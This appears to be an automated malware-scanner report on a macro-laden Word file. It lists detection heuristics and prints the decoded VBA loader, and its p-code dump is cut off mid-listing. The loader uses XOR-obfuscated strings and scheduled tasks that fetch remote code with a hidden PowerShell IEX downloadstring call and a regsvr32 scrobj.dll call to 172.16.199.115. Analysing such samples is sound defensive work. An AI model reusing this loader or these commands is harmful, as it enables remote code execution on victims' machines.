MALICIOUS
552
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1059.001 PowerShell
T1203 Exploitation for Client Execution
T1140 Deobfuscate/Decode Files or Information
The sample contains a VBA macro with an AutoOpen function that utilizes WScript.Shell to execute a PowerShell command. This script appears to be obfuscated and likely decodes and executes a payload from a remote source, as indicated by the embedded URLs. The presence of `Shell()` and `CreateObject()` calls, along with references to PowerShell and WScript, strongly suggests a downloader or droppper functionality.
Heuristics 15
-
ClamAV: Doc.Dropper.Agent-6544801-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Dropper.Agent-6544801-0
-
VBA macros detected medium 7 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
WScript.Shell usage critical OLE_VBA_WSCRIPTWScript.Shell usageMatched line in script
'schtasks.exe /Create /TN \Windows-Service\srcP01 /ST 01:00 /SC ONCE /TR "wscript //E:VBScript .\test1.txt 'WScript.Shell' 'powershell.exe -nop -w hidden -c' 'IEX ((new-object net.webclient).downloadstring(' 'http://172.16.199.115:80/a' '))'" /f lol1 = "1C17001D0F143F1C7D001D2D455D263C0A151C0C4E480021733932210B160A391C593B0C1C113D0C3639163A0622" -
PowerShell reference in VBA critical OLE_VBA_PSPowerShell reference in VBAMatched line in script
'schtasks.exe /Create /TN \Windows-Service\srcP01 /ST 01:00 /SC ONCE /TR "wscript //E:VBScript .\test1.txt 'WScript.Shell' 'powershell.exe -nop -w hidden -c' 'IEX ((new-object net.webclient).downloadstring(' 'http://172.16.199.115:80/a' '))'" /f lol1 = "1C17001D0F143F1C7D001D2D455D263C0A151C0C4E480021733932210B160A391C593B0C1C113D0C3639163A0622" -
LOLBin reference in VBA critical OLE_VBA_LOLBINLOLBin reference in VBAMatched line in script
Set wt = VBA.CreateObject(XORDecryption("NothingToSeeHere", lmao)) 'schtasks.exe /Create /TN \Windows-Service\srcR1 /ST 01:00 /SC ONCE /TR "regsvr32 /s /n /u /i:http://172.16.199.115:80/akhgkgjk scrobj.dll" /f lol1 = "1C17001D0F143F1C7D001D2D455D263C0A151C0C4E480021733932210B160A391C593B0C1C113D0C3639163A0620" -
Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADERAuto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.Matched line in script
lmao = "38270b1b07172041000d002409" Set wt = VBA.CreateObject(XORDecryption("NothingToSeeHere", lmao)) dir = wt.ExpandEnvironmentStrings("%temp%\test1.txt") -
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
lmao = "38270b1b07172041000d002409" Set wt = VBA.CreateObject(XORDecryption("NothingToSeeHere", lmao)) dir = wt.ExpandEnvironmentStrings("%temp%\test1.txt") -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Sub AutoOpen() If ActiveDocument.ProtectionType <> wdNoProtection Then -
Reference to PowerShell high SC_STR_POWERSHELLReference to PowerShell
-
Reference to Windows Script Host high SC_STR_WSCRIPTReference to Windows Script Host
-
LOLBin token sequence in document text high SE_LOLBIN_RUN_COMMANDExtracted document text contains a Windows script/execution tool name (PowerShell, mshta, cmd, rundll32, regsvr32, …) within 220 characters of a dangerous flag, command verb, or URL. This is a visible 'run this' instruction in HTML/PDF/RTF lure bodies, or — in macro-laden Office files — the macro's own string-pool entries appearing adjacent in extracted text.
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://172.16.199.115:80/a In document text (OLE body)
- http://172.16.199.115:80/akhgkgjkIn document text (OLE body)
- http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)
- http://schemas.openxmlformats.org/officeDocument/2006/bibliographyIn document text (OLE body)
- http://schemas.openxmlformats.org/officeDocument/2006/customXmlIn document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 26348 bytes |
SHA-256: 92cde5b5d91bc6f4da813e9a9b2c8a6a6b86fc5731f9e3f818c9c0427b2504f2 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 4 long base64-like blob(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "Module1"
Public Function XORDecryption(CodeKey As String, DataIn As String) As String
Dim lonDataPtr As Long
Dim strDataOut As String
Dim intXOrValue1 As Integer
Dim intXOrValue2 As Integer
For lonDataPtr = 1 To (Len(DataIn) / 2)
'The first value to be XOr-ed comes from the data to be encrypted
intXOrValue1 = Val("&H" & (Mid$(DataIn, (2 * lonDataPtr) - 1, 2)))
'The second value comes from the code key
intXOrValue2 = Asc(Mid$(CodeKey, ((lonDataPtr Mod Len(CodeKey)) + 1), 1))
strDataOut = strDataOut + Chr(intXOrValue1 Xor intXOrValue2)
Next lonDataPtr
XORDecryption = strDataOut
End Function
Public Function XOREncryption(CodeKey As String, DataIn As String) As String
Dim lonDataPtr As Long
Dim strDataOut As String
Dim temp As Integer
Dim tempstring As String
Dim intXOrValue1 As Integer
Dim intXOrValue2 As Integer
For lonDataPtr = 1 To Len(DataIn)
'The first value to be XOr-ed comes from the data to be encrypted
intXOrValue1 = Asc(Mid$(DataIn, lonDataPtr, 1))
'The second value comes from the code key
intXOrValue2 = Asc(Mid$(CodeKey, ((lonDataPtr Mod Len(CodeKey)) + 1), 1))
temp = (intXOrValue1 Xor intXOrValue2)
tempstring = Hex(temp)
If Len(tempstring) = 1 Then tempstring = "0" & tempstring
strDataOut = strDataOut + tempstring
Next lonDataPtr
XOREncryption = strDataOut
End Function
Public Function runPow()
Dim dir As String
Dim lol As String
Dim lol1 As String
Dim lol2 As String
Dim lol3 As String
Dim lol4 As String
Dim lol5 As String
Dim lmao As String
Dim wt As Object
Dim windowStyle As Integer: windowStyle = 0
Dim waitOnReturn As Boolean: waitOnReturn = False
lmao = "38270b1b07172041000d002409"
Set wt = VBA.CreateObject(XORDecryption("NothingToSeeHere", lmao))
dir = wt.ExpandEnvironmentStrings("%temp%\test1.txt")
Dim objStream
Dim data As String
Set objStream = CreateObject("ADODB.Stream")
objStream.Open
'Set wt = CreateObject(WScript.Arguments(0))
data = "3C111C49191374527326172D040600010D1E0D0A1A4F033C30170C38115C243C0801050C00132747634C4C"
objStream.WriteText XORDecryption("NothingToSeeHere", data) + Chr(13) + Chr(10)
'wt.Run WScript.Arguments(1) + " " +chr(34)+WScript.Arguments(2)+chr(39)+WScript.Arguments(3)+chr(39)+WScript.Arguments(4)+chr(34),0
data = "1800463B1B0974380006172115064B0F1D131D040B09201C7B544C684E52476E4D54430A06157C5C674C4E1F361117271F0046281C002102360B113B4D404C650C1C1A415D5E7D440436063A0C0211602E060F1C03023A1B204D56614E110D3C474751404530070C210C153C4B3317291A190D071A147C5B7A4E0620175A567A465858"
objStream.WriteText XORDecryption("NothingToSeeHere", data) + Chr(13) + Chr(10)
objStream.SaveToFile dir, 2
objStream.Close
'schtasks.exe /Create /TN \Windows-Service\srcP01 /ST 01:00 /SC ONCE /TR "wscript //E:VBScript .\test1.txt 'WScript.Shell' 'powershell.exe -nop -w hidden -c' 'IEX ((new-object net.webclient).downloadstring(' 'http://172.16.199.115:80/a' '))'" /f
lol1 = "1C17001D0F143F1C7D001D2D455D263C0A151C0C4E480021733932210B160A391C593B0C1C113D0C3639163A0622"
lol2 = "4F5B3B3D4E"
lol3 = "554458494134174F1C2B260D455D311C4F561F1A0D153D1F27454A672048330C3C171A001E1374"
lol4 = "4F533F3A0D153D1F274B3620001E09694F5318061902261C3B0009244B171D2B4F5906061E477918730D0C2C01170B6E42174F49492E1137734D4D26000548210D1E0D0A1A473A0A274B122D071109270A1A1C4040033B183D090A290101113C061A0F41494773"
lol5 = "48544F404740764F7C03"
Dim hour As Integer
For hour = 0 To 11
lol = XORDecryption("NothingToSeeHere", lol1)
lol = lol + Format(hour * 2 + 1, "00")
lol = lol + XORDecryption("NothingToSeeHere", lol2)
lol = lol + Format(hour * 2 + 1, "00")
lol = lol + XORDecryption("NothingToSeeHere", lol3)
lol = lol + dir
lol = lol + XORDecryption("NothingToSeeHere", lol4)
lol = lol + "http://172.16.199.115:80/a"
lol = lol + XORDecryption("NothingToSeeHere", lol5)
wt.Run lol, windowStyle, waitOnReturn
Next hour
'schtasks.exe /Run /TN \Windows-Service\srcP01
lol = "1C17001D0F143F1C7D001D2D455D373B0154473D204708383A0B01271201481D0A061E000D02081C2106357854"
wt.Run XORDecryption("NothingToSeeHere", lol), windowStyle, waitOnReturn
End Function
Public Function runReg()
Dim lmao As String
Dim lol As String
Dim lol1 As String
Dim lol2 As String
Dim lol3 As String
Dim lol4 As String
Dim wt As Object
Dim windowStyle As Integer: windowStyle = 0
Dim waitOnReturn As Boolean: waitOnReturn = False
lmao = "38270b1b07172041000d002409"
Set wt = VBA.CreateObject(XORDecryption("NothingToSeeHere", lmao))
'schtasks.exe /Create /TN \Windows-Service\srcR1 /ST 01:00 /SC ONCE /TR "regsvr32 /s /n /u /i:http://172.16.199.115:80/akhgkgjk scrobj.dll" /f
lol1 = "1C17001D0F143F1C7D001D2D455D263C0A151C0C4E480021733932210B160A391C593B0C1C113D0C3639163A0620"
lol2 = "4F5B3B3D4E"
lol3 = "554458494134174F1C2B260D455D311C4F561A0C0914221D6057456716524A204F5B1D49410E6E"
lol4 = "4F070B1B01053E413709096A455D03"
Dim hour As Integer
For hour = 0 To 11
lol = XORDecryption("NothingToSeeHere", lol1)
lol = lol + Format(hour * 2 + 1, "00")
lol = lol + XORDecryption("NothingToSeeHere", lol2)
lol = lol + Format(hour * 2 + 1, "00")
lol = lol + XORDecryption("NothingToSeeHere", lol3)
lol = lol + "http://172.16.199.115:80/akhgkgjk"
lol = lol + XORDecryption("NothingToSeeHere", lol4)
wt.Run lol, windowStyle, waitOnReturn
Next hour
'schtasks.exe /run /TN \Windows-Service\srcR01
lol = "1C17001D0F143F1C7D001D2D455D173B0154473D204708383A0B01271201481D0A061E000D02081C2106377854"
wt.Run XORDecryption("NothingToSeeHere", lol), windowStyle, waitOnReturn
End Function
Public Function runEncrypt()
Dim lol As String
Dim obj As String
Dim answer As Integer
lol = InputBox("Please enter your command", "Encryption")
lol = XOREncryption("NothingToSeeHere", lol)
answer = MsgBox(lol, vbYesNo + vbQuestion, "Copy CipherText to Clipboard")
If answer = vbYes Then
Dim MSForms_DataObject As Object
Set MSForms_DataObject = CreateObject("new:{1C3B4210-F441-11CE-B9EA-00AA006B1A69}")
MSForms_DataObject.SetText lol
MSForms_DataObject.PutInClipboard
Set MSForms_DataObject = Nothing
End If
End Function
Public Function InsertImage()
Dim imagePath As String
Dim i As Integer
Dim pagenum As String
Dim TtlPgs As Integer
TtlPgs = Selection.Information(wdNumberOfPagesInDocument)
For i = 1 To TtlPgs
Selection.HomeKey Unit:=wdStory
imagePath = "C:\Users\Tester\Desktop\123.png"
ActiveDocument.GoTo(What:=wdGoToPage, Count:=i).Select
ActiveDocument.Shapes.AddPicture(FileName:=imagePath, _
LinkToFile:=False, _
SaveWithDocument:=True, _
Left:=-72, _
Top:=-57, _
Anchor:=Selection.Range, _
Width:=600, _
Height:=842).Select
pagenum = i
Selection.ShapeRange.Name = "BabyRoshan" + pagenum
Next i
End Function
Public Function RemovePicture()
Dim i As Integer
With ActiveDocument
For i = 1 To .InlineShapes.Count
.InlineShapes(i).ConvertToShape
Next i
.Shapes.SelectAll
Selection.Delete
End With
End Function
Public Function UnprotectReadOnly()
If ActiveDocument.ProtectionType <> wdNoProtection Then
ActiveDocument.Unprotect Password:="ahihiihaha"
End If
End Function
Public Function ProtectReadOnly()
If ActiveDocument.ProtectionType = wdNoProtection Then
ActiveDocument.Protect Password:="ahihiihaha", NoReset:=False, Type:= _
wdAllowOnlyReading, UseIRM:=False, EnforceStyleLock:=False
End If
End Function
Public Function Black()
Selection.WholeStory
Selection.Font.Color = -587137025
End Function
Public Function White()
Selection.WholeStory
Selection.Font.Color = -603914241
End Function
Sub AutoOpen()
If ActiveDocument.ProtectionType <> wdNoProtection Then
ActiveWindow.View = wdPrintView
UnprotectReadOnly
Black
'runReg
'runPow
RemovePicture
Else
White
InsertImage
ProtectReadOnly
End If
End Sub
' Processing file: /tmp/qstore_b48516i1
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 924 bytes
' Macros/VBA/Module1 - 15072 bytes
' Line #0:
' FuncDefn (Public Function XORDecryption(CodeKey As String, DataIn As String) As String)
' Line #1:
' Dim
' VarDefn lonDataPtr (As Long)
' Line #2:
' Dim
' VarDefn strDataOut (As String)
' Line #3:
' Dim
' VarDefn intXOrValue1 (As Integer)
' Line #4:
' Dim
' VarDefn intXOrValue2 (As Integer)
' Line #5:
' Line #6:
' StartForVariable
' Ld lonDataPtr
' EndForVariable
' LitDI2 0x0001
' Ld DataIn
' FnLen
' LitDI2 0x0002
' Div
' Paren
' For
' Line #7:
' QuoteRem 0x0008 0x0040 "The first value to be XOr-ed comes from the data to be encrypted"
' Line #8:
' LitStr 0x0002 "&H"
' Ld DataIn
' LitDI2 0x0002
' Ld lonDataPtr
' Mul
' Paren
' LitDI2 0x0001
' Sub
' LitDI2 0x0002
' ArgsLd Mid$ 0x0003
' Paren
' Concat
' ArgsLd Val 0x0001
' St intXOrValue1
' Line #9:
' QuoteRem 0x0008 0x0028 "The second value comes from the code key"
' Line #10:
' Ld CodeKey
' Ld lonDataPtr
' Ld CodeKey
' FnLen
' Mod
' Paren
' LitDI2 0x0001
' Add
' Paren
' LitDI2 0x0001
' ArgsLd Mid$ 0x0003
' ArgsLd Asc 0x0001
' St intXOrValue2
' Line #11:
' Ld strDataOut
' Ld intXOrValue1
' Ld intXOrValue2
' Xor
' ArgsLd Chr 0x0001
' Add
' St strDataOut
' Line #12:
' StartForVariable
' Ld lonDataPtr
' EndForVariable
' NextVar
' Line #13:
' Ld strDataOut
' St XORDecryption
' Line #14:
' EndFunc
' Line #15:
' Line #16:
' FuncDefn (Public Function XOREncryption(CodeKey As String, DataIn As String) As String)
' Line #17:
' Dim
' VarDefn lonDataPtr (As Long)
' Line #18:
' Dim
' VarDefn strDataOut (As String)
' Line #19:
' Dim
' VarDefn temp (As Integer)
' Line #20:
' Dim
' VarDefn tempstring (As String)
' Line #21:
' Dim
' VarDefn intXOrValue1 (As Integer)
' Line #22:
' Dim
' VarDefn intXOrValue2 (As Integer)
' Line #23:
' Line #24:
' StartForVariable
' Ld lonDataPtr
' EndForVariable
' LitDI2 0x0001
' Ld DataIn
' FnLen
' For
' Line #25:
' QuoteRem 0x0008 0x0040 "The first value to be XOr-ed comes from the data to be encrypted"
' Line #26:
' Ld DataIn
' Ld lonDataPtr
' LitDI2 0x0001
' ArgsLd Mid$ 0x0003
' ArgsLd Asc 0x0001
' St intXOrValue1
' Line #27:
' QuoteRem 0x0008 0x0028 "The second value comes from the code key"
' Line #28:
' Ld CodeKey
' Ld lonDataPtr
' Ld CodeKey
' FnLen
' Mod
' Paren
' LitDI2 0x0001
' Add
' Paren
' LitDI2 0x0001
' ArgsLd Mid$ 0x0003
' ArgsLd Asc 0x0001
' St intXOrValue2
' Line #29:
' Ld intXOrValue1
' Ld intXOrValue2
' Xor
' Paren
' St temp
' Line #30:
' Ld temp
' ArgsLd Hex 0x0001
' St tempstring
' Line #31:
' Ld tempstring
' FnLen
' LitDI2 0x0001
' Eq
' If
' BoSImplicit
' LitStr 0x0001 "0"
' Ld tempstring
' Concat
' St tempstring
' EndIf
' Line #32:
' Ld strDataOut
' Ld tempstring
' Add
' St strDataOut
' Line #33:
' StartForVariable
' Ld lonDataPtr
' EndForVariable
' NextVar
' Line #34:
' Ld strDataOut
' St XOREncryption
' Line #35:
' EndFunc
' Line #36:
' Line #37:
' FuncDefn (Public Function runPow())
' Line #38:
' Dim
' VarDefn Dir (As String)
' Line #39:
' Dim
' VarDefn lol (As String)
' Line #40:
' Dim
' VarDefn lol1 (As String)
' Line #41:
' Dim
' VarDefn lol2 (As String)
' Line #42:
' Dim
' VarDefn lol3 (As String)
' Line #43:
' Dim
' VarDefn lol4 (As String)
' Line #44:
' Dim
' VarDefn lol5 (As String)
' Line #45:
' Dim
' VarDefn lmao (As String)
' Line #46:
' Dim
' VarDefn wt (As Object)
' Line #47:
' Dim
' VarDefn windowStyle (As Integer)
' BoS 0x0000
' LitDI2 0x0000
' St windowStyle
' Line #48:
' Dim
' VarDefn waitOnReturn (As Boolean)
' BoS 0x0000
' LitVarSpecial (False)
' St waitOnReturn
' Line #49:
' LitStr 0x001A "38270b1b07172041000d002409"
' St lmao
' Line #50:
' SetStmt
' LitStr 0x0010 "NothingToSeeHere"
' Ld lmao
' ArgsLd XORDecryption 0x0002
' Ld VBA
' ArgsMemLd CreateObject 0x0001
' Set wt
' Line #51:
' LitStr 0x0010 "%temp%\test1.txt"
' Ld wt
' ArgsMemLd ExpandEnvironmentStrings 0x0001
' St Dir
' Line #52:
' Line #53:
' Line #54:
' Dim
' VarDefn objStream
' Line #55:
' Dim
' VarDefn data (As String)
' Line #56:
' SetStmt
' LitStr 0x000C "ADODB.Stream"
' ArgsLd CreateObject 0x0001
' Set objStream
' Line #57:
' Ld objStream
' ArgsMemCall Open 0x0000
' Line #58:
' QuoteRem 0x0004 0x002B "Set wt = CreateObject(WScript.Arguments(0))"
' Line #59:
' LitStr 0x0056 "3C111C49191374527326172D040600010D1E0D0A1A4F033C30170C38115C243C0801050C00132747634C4C"
' St data
' Line #60:
' LitStr 0x0010 "NothingToSeeHere"
' Ld data
' ArgsLd XORDecryption 0x0002
' LitDI2 0x000D
' ArgsLd Chr 0x0001
' Add
' LitDI2 0x000A
' ArgsLd Chr 0x0001
' Add
' Ld objStream
' ArgsMemCall WriteText 0x0001
' Line #61:
' QuoteRem 0x0004 0x0083 "wt.Run WScript.Arguments(1) + " " +chr(34)+WScript.Arguments(2)+chr(39)+WScript.Arguments(3)+chr(39)+WScript.Arguments(4)+chr(34),0"
' Line #62:
' LitStr 0x0106 "1800463B1B0974380006172115064B0F1D131D040B09201C7B544C684E52476E4D54430A06157C5C674C4E1F361117271F0046281C002102360B113B4D404C650C1C1A415D5E7D440436063A0C0211602E060F1C03023A1B204D56614E110D3C474751404530070C210C153C4B3317291A190D071A147C5B7A4E0620175A567A465858"
' St data
' Line #63:
' LitStr 0x0010 "NothingToSeeHere"
' Ld data
' ArgsLd XORDecryption 0x0002
' LitDI2 0x000D
' ArgsLd Chr 0x0001
' Add
' LitDI2 0x000A
' ArgsLd Chr 0x0001
' Add
' Ld objStream
' ArgsMemCall WriteText 0x0001
' Line #64:
' Ld Dir
' LitDI2 0x0002
' Ld objStream
' ArgsMemCall SaveToFile 0x0002
' Line #65:
' Ld objStream
' ArgsMemCall Close 0x0000
' Line #66:
' Line #67:
' Line #68:
' QuoteRem 0x0004 0x00F4 "schtasks.exe /Create /TN \Windows-Service\srcP01 /ST 01:00 /SC ONCE /TR "wscript //E:VBScript .\test1.txt 'WScript.Shell' 'powershell.exe -nop -w hidden -c' 'IEX ((new-object net.webclient).downloadstring(' 'http://172.16.199.115:80/a' '))'" /f"
' Line #69:
' LitStr 0x005C "1C17001D0F143F1C7D001D2D455D263C0A151C0C4E480021733932210B160A391C593B0C1C113D0C3639163A0622"
' St lol1
' Line #70:
' LitStr 0x000A "4F5B3B3D4E"
' St lol2
' Line #71:
' LitStr 0x004E "554458494134174F1C2B260D455D311C4F561F1A0D153D1F27454A672048330C3C171A001E1374"
' St lol3
' Line #72:
' LitStr 0x00CE "4F533F3A0D153D1F274B3620001E09694F5318061902261C3B0009244B171D2B4F5906061E477918730D0C2C01170B6E42174F49492E1137734D4D26000548210D1E0D0A1A473A0A274B122D071109270A1A1C4040033B183D090A290101113C061A0F41494773"
' St lol4
' Line #73:
' LitStr 0x0014 "48544F404740764F7C03"
' St lol5
' Line #74:
' Dim
' VarDefn hour (As Integer)
' Line #75:
' StartForVariable
' Ld hour
' EndForVariable
' LitDI2 0x0000
' LitDI2 0x000B
' For
' Line #76:
' LitStr 0x0010 "NothingToSeeHere"
' Ld lol1
' ArgsLd XORDecryption 0x0002
' St lol
' Line #77:
' Ld lol
' Ld hour
' LitDI2 0x0002
' Mul
' LitDI2 0x0001
' Add
' LitStr 0x0002 "00"
' ArgsLd Format 0x0002
' Add
' St lol
' Line #78:
' Ld lol
' LitStr 0x0010 "NothingToSeeHere"
' Ld lol2
' ArgsLd XORDecryption 0x0002
' Add
' St lol
' Line #79:
' Ld lol
' Ld hour
' LitDI2 0x0002
' Mul
' LitDI2 0x0001
' Add
' LitStr 0x0002 "00"
' ArgsLd Format 0x0002
' Add
' St lol
' Line #80:
' Ld lol
' LitStr 0x0010 "NothingToSeeHere"
' Ld lol3
' ArgsLd XORDecryption 0x0002
' Add
' St lol
' Line #81:
' Ld lol
' Ld Dir
' Add
' St lol
' Line #82:
' Ld lol
' LitStr 0x0010 "NothingToSeeHere"
' Ld lol4
' ArgsLd XORDecryption 0x0002
' Add
' St lol
' Line #83:
' Ld lol
' LitStr 0x001A "http://172.16.199.115:80/a"
' Add
' St lol
' Line #84:
' Ld lol
' LitStr 0x0010 "NothingToSeeHere"
' Ld lol5
' ArgsLd XORDecryption 0x0002
' Add
' St lol
' Line #85:
' Ld lol
' Ld windowStyle
' Ld waitOnReturn
' Ld wt
' ArgsMemCall Run 0x0003
' Line #86:
' StartForVariable
' Ld hour
' EndForVariable
' NextVar
' Line #87:
' QuoteRem 0x0004 0x002D "schtasks.exe /Run /TN \Windows-Service\srcP01"
' Line #88:
' LitStr 0x005A "1C17001D0F143F1C7D001D2D455D373B0154473D204708383A0B01271201481D0A061E000D02081C2106357854"
' St lol
' Line #89:
' LitStr 0x0010 "NothingToSeeHere"
' Ld lol
' ArgsLd XORDecryption 0x0002
' Ld windowStyle
' Ld waitOnReturn
' Ld wt
' ArgsMemCall Run 0x0003
' Line #90:
' Line #91:
' EndFunc
' Line #92:
' Line #93:
' Line #94:
' FuncDefn (Public Function runReg())
' Line #95:
' Dim
' VarDefn lmao (As String)
' Line #96:
' Dim
' VarDefn lol (As String)
' Line #97:
' Dim
' VarDefn lol1 (As String)
' Line #98:
' Dim
' VarDefn lol2 (As String)
' Line #99:
' Dim
' VarDefn lol3 (As String)
' Line #100:
' Dim
' VarDefn lol4 (As String)
' Line #101:
' Dim
' VarDefn wt (As Object)
' Line #102:
' Dim
' VarDefn windowStyle (As Integer)
' BoS 0x0000
' LitDI2 0x0000
' St windowStyle
' Line #103:
' Dim
' VarDefn waitOnReturn (As Boolean)
' BoS 0x0000
' LitVarSpecial (False)
' St waitOnReturn
' Line #104:
' LitStr 0x001A "38270b1b07172041000d002409"
' St lmao
' Line #105:
' SetStmt
' LitStr 0x0010 "NothingToSeeHere"
' Ld lmao
' ArgsLd XORDecryption 0x0002
' Ld VBA
' ArgsMemLd CreateObject 0x0001
' Set wt
' Line #106:
' QuoteRem 0x0004 0x008D "schtasks.exe /Create /TN \Windows-Service\srcR1 /ST 01:00 /SC ONCE /TR "regsvr32 /s /n /u /i:http://172.16.199.115:80/akhgkgjk scrobj.dll" /f"
' Line #107:
' LitStr 0x005C "1C17001D0F143F1C7D001D2D455D263C0A151C0C4E480021733932210B160A391C593B0C1C113D0C3639163A0620"
' St lol1
' Line #108:
' LitStr 0x000A "4F5B3B3D4E"
' St lol2
' Line #109:
' LitStr 0x004E "554458494134174F1C2B260D455D311C4F561A0C0914221D6057456716524A204F5B1D49410E6E"
' St lol3
' Line #110:
' LitStr 0x001E "4F070B1B01053E413709096A455D03"
' St lol4
' Line #111:
' Dim
' VarDefn hour (As Integer)
' Line #112:
' StartForVariable
' Ld hour
' EndForVariable
' LitDI2 0x0000
' LitDI2 0x000B
' For
' Line #113:
' LitStr 0x0010 "NothingToSeeHere"
' Ld lol1
' ArgsLd XORDecryption 0x0002
' St lol
' Line #114:
' Ld lol
' Ld hour
' LitDI2 0x0002
' Mul
' LitDI2 0x0001
' Add
' LitStr 0x0002 "00"
' ArgsLd Format 0x0002
' Add
' St lol
' Line #115:
' Ld lol
' LitStr 0x0010 "NothingToSeeHere"
' Ld lol2
' ArgsLd XORDecryption 0x0002
' Add
' St lol
' Line #116:
' Ld lol
' Ld hour
' LitDI2 0x0002
' Mul
' LitDI2 0x0001
' Add
' LitStr 0x0002 "00"
' ArgsLd Format 0x0002
' Add
' St lol
' Line #117:
' Ld lol
' LitStr 0x0010 "NothingToSeeHere"
' Ld lol3
' ArgsLd XORDecryption 0x0002
' Add
' St lol
' Line #118:
' Ld lol
' LitStr 0x0021 "http://172.16.199.115:80/akhgkgjk"
' Add
' St lol
' Line #119:
' Ld lol
' LitStr 0x0010 "NothingToSeeHere"
' Ld lol4
' ArgsLd XORDecryption 0x0002
' Add
' St lol
' Line #120:
' Ld lol
' Ld windowStyle
' Ld waitOnReturn
' Ld wt
' ArgsMemCall Run 0x0003
' Line #121:
' StartForVariable
' Ld hour
' EndForVariable
' NextVar
' Line #122:
' QuoteRem 0x0004 0x002D "schtasks.exe /run /TN \Windows-Service\srcR01"
' Line #123:
' LitStr 0x005A "1C17001D0F143F1C7D001D2D455D173B0154473D204708383A0B01271201481D0A061E000D02081C2106377854"
' St lol
' Line #124:
' LitStr 0x0010 "NothingToSeeHere"
' Ld lol
' ArgsLd XORDecryption 0x0002
' Ld windowStyle
' Ld waitOnReturn
' Ld wt
' ArgsMemCall Run 0x0003
' Line #125:
' EndFunc
' Line #126:
' FuncDefn (Public Function runEncrypt())
' Line #127:
' Dim
' VarDefn lol (As String)
' Line #128:
' Dim
' VarDefn obj (As String)
' Line #129:
' Dim
' VarDefn answer (As Integer)
' Line #130:
' Line #131:
' LitStr 0x0019 "Please enter your command"
' LitStr 0x000A "Encryption"
' ArgsLd InputBox 0x0002
' St lol
' Line #132:
' LitStr 0x0010 "NothingToSeeHere"
' Ld lol
' ArgsLd XOREncryption 0x0002
' St lol
' Line #133:
' Line #134:
' Ld lol
' Ld vbYesNo
' Ld vbQuestion
' Add
' LitStr 0x001C "Copy CipherText to Clipboard"
' ArgsLd MsgBox 0x0003
' St answer
' Line #135:
' Ld answer
' Ld vbYes
' Eq
' IfBlock
' Line #136:
' Dim
' VarDefn MSForms_DataObject (As Object)
' Line #137:
' SetStmt
' LitStr 0x002A "new:{1C3B4210-F441-11CE-B9EA-00AA006B1A69}"
' ArgsLd CreateObject 0x0001
' Set MSForms_DataObject
' Line #138:
' Ld lol
' Ld MSForms_DataObject
' ArgsMemCall SetText 0x0001
' Line #139:
' Ld MSForms_DataObject
' ArgsMemCall PutInClipboard 0x0000
' Line #140:
' SetStmt
' LitNothing
' Set MSForms_DataObject
' Line #141:
' EndIfBlock
' Line #142:
' EndFunc
' Line #143:
' Line #144:
' FuncDefn (Public Function InsertImage())
' Line #145:
' Dim
' VarDefn imagePath (As String)
' Line #146:
' Dim
' VarDefn i (As Integer)
' Line #147:
' Dim
' VarDefn pagenum (As String)
' Line #148:
' Dim
' VarDefn TtlPgs (As Integer)
' Line #149:
' Ld wdNumberOfPagesInDocument
' Ld Selection
' ArgsMemLd Information 0x0001
' St TtlPgs
' Line #150:
' StartForVariable
' Ld i
' EndForVariable
' LitDI2 0x0001
' Ld TtlPgs
' For
' Line #151:
' Ld wdStory
' ParamNamed Unit
' Ld Selection
' ArgsMemCall HomeKey 0x0001
' Line #152:
' LitStr 0x001F "C:\Users\Tester\Desktop\123.png"
' St imagePath
' Line #153:
' Ld wdGoToPage
' ParamNamed What
' Ld i
' ParamNamed Count
' Ld ActiveDocument
' ArgsMemLd Goto 0x0002
' ArgsMemCall Select 0x0000
' Line #154:
' LineCont 0x001C 0A 00 08 00 0E 00 08 00 12 00 08 00 17 00 08 00 1C 00 08 00 22 00 08 00 26 00 08 00
' Ld imagePath
' ParamNamed FileName
' LitVarSpecial (False)
' ParamNamed LinkToFile
' LitVarSpecial (True)
' ParamNamed SaveWithDocument
' LitDI2 0x0048
' UMi
' ParamNamed Left
' LitDI2 0x0039
' UMi
' ParamNamed Top
' Ld Selection
' MemLd Range
' ParamNamed Anchor
' LitDI2 0x0258
' ParamNamed Width
' LitDI2 0x034A
' ParamNamed Height
' Ld ActiveDocument
' MemLd Shapes
' ArgsMemLd AddPicture 0x0008
' ArgsMemCall Select 0x0000
' Line #155:
' Ld i
' St pagenum
' Line #156:
' LitStr 0x000A "BabyRoshan"
' Ld pagenum
' Add
' Ld Selection
' MemLd ShapeRange
' MemSt Name
' Line #157:
' StartForVariable
